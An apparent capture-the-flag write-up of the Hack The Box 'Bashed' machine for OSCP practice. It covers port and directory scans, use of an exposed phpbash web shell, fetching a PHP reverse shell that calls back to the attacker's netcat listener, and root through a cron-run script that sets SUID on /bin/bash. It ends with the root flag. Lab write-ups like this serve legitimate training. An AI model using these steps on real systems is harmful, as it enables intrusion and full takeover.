Bashed - Easy
OSCP Prep Box

Introduction@Bashed:~$
Enumeration
Nmap
┌─[sheinn101@parrot]─[~/htb/oscp/bashed]
└──╼ [??]$ sudo nmap -sC -sV -oN nmap.out 10.10.10.68
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-22 21:42 +0630
Nmap scan report for 10.10.10.68
Host is up (0.73s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.41 seconds
There is only one opened port which is HTTP 80.
Web


phpbash is a standalone, semi-interactive web shell. It's main purpose is to assist in penetration tests where traditional reverse shells are not possible. The design is based on the default Kali Linux terminal colors, so pentesters should feel right at home. https://github.com/Arrexel/phpbash
Now we should try to scan directory with dirsearch
.
Directory Scan
┌─[sheinn101@parrot]─[~/htb/oscp/bashed]
└──╼ [??]$ sudo dirsearch -u http://10.10.10.68/
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10903
Output File: /usr/local/lib/python3.9/dist-packages/dirsearch-0.4.1-py3.9.egg/dirsearch/reports/10.10.10.68/_21-12-22_21-50-10.txt
Error Log: /usr/local/lib/python3.9/dist-packages/dirsearch-0.4.1-py3.9.egg/dirsearch/logs/errors-21-12-22_21-50-10.log
Target: http://10.10.10.68/
[21:50:11] Starting:
[21:50:16] 301 - 307B - /js -> http://10.10.10.68/js/
[21:50:19] 301 - 308B - /php -> http://10.10.10.68/php/
[21:51:14] 200 - 8KB - /about.html
[21:52:01] 200 - 0B - /config.php
[21:52:03] 200 - 8KB - /contact.html
[21:52:05] 301 - 308B - /css -> http://10.10.10.68/css/
[21:52:08] 200 - 1KB - /dev/
[21:52:08] 301 - 308B - /dev -> http://10.10.10.68/dev/
[21:52:17] 301 - 310B - /fonts -> http://10.10.10.68/fonts/
[21:52:24] 301 - 311B - /images -> http://10.10.10.68/images/
[21:52:24] 200 - 2KB - /images/
[21:52:26] 200 - 8KB - /index.html
[21:52:28] 200 - 3KB - /js/
[21:52:49] 200 - 939B - /php/
[21:53:00] 403 - 299B - /server-status
[21:53:00] 403 - 300B - /server-status/
[21:53:18] 200 - 14B - /uploads/
[21:53:18] 301 - 312B - /uploads -> http://10.10.10.68/uploads/
Task Completed
<dirsearch.dirsearch.Program object at 0x7fd42cbdc1c0>
If we go uploads
directory or config.php
file, it was just a blank page and there is no interesting things. But in /dev/
directory, we can see there is two file which is phpbash
.

In phpbash.php
file:

We can see its was just like terminal and get a shell which is users as a www-data
.

We can get user.txt
in arrexel
's home directory. When we get a shell, we should always try sudo -l
in an easy box.
www-data@bashed:/home/arrexel# sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
We can use sudo
without password for scriptmanager
but this shell does not has persistance, so we can't escalate to scriptmanager
user. We should try to get reverse shell to us. In this case, we can't get a reverse shell with some one liner reverse shell because of may be some filter in the backend .But we can download reverse.php
to uploads
and get a shell.
Getting Rev Shell
You can search this php reverse shell in your kali
or parrot
by using locate
command.And change your ip address, port and listen with netcat
.
I created a web server to transfer that reverse shell file.
┌─[sheinn101@parrot]─[~/htb/oscp/bashed]
└──╼ [??]$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

We can use wget
to download file, go to uploads
directory and download it.

Now , If we go to this url, we will get a shell .
┌─[sheinn101@parrot]─[~/htb/oscp/bashed]
└──╼ [??]$ rlwrap nc -nvlp 1337
listening on [any] 1337 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.68] 58986
Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
08:01:07 up 56 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
I used rlwrap
in front of nc
to get usable left and right
key.
python3 -c 'import pty;pty.spawn("/bin/bash")
Privilege Escalation
Now we can escalate to scriptmanager
user by using this command.
sudo -u scriptmanager bash
whoami
whoami
scriptmanager
scriptmanager@bashed:/home$
After some enumeration, I found a folder which is own by scriptmanager
name called scripts
ls -al
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Dec 4 2017 .
drwxr-xr-x 23 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py
-rw-r--r-- 1 root root 12 Dec 22 08:10 test.txt
scriptmanager@bashed:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
It runing with cronjob
. To get root access, we need to modify test.py
file. In this case I just gave special user permission to /bin/bash
and you can use python reverse shell to get root access.
scriptmanager@bashed:/scripts$ echo "import os; os.system('chmod +s /bin/bash')" > test.py
<ts$ echo "import os; os.system('chmod +s /bin/bash')" > test.py
ls -al /bin/bash
-rwxr-xr-x 1 root root 1037528 Jun 24 2016 /bin/bash
ls -al /bin/bash
-rwxr-xr-x 1 root root 1037528 Jun 24 2016 /bin/bash
ls -al /bin/bash
-rwxr-xr-x 1 root root 1037528 Jun 24 2016 /bin/bash
ls -al /bin/bash
-rwsr-sr-x 1 root root 1037528 Jun 24 2016 /bin/bash
/bin/bash -p
id
uid=1001(scriptmanager) gid=1001(scriptmanager) euid=0(root) egid=0(root) groups=0(root),1001(scriptmanager)
whoami
root
cat /root/root.txt
cc4f0afe3a1026d402ba10329674a8e2
bash-4.3#
Now we pwned it.

Last updated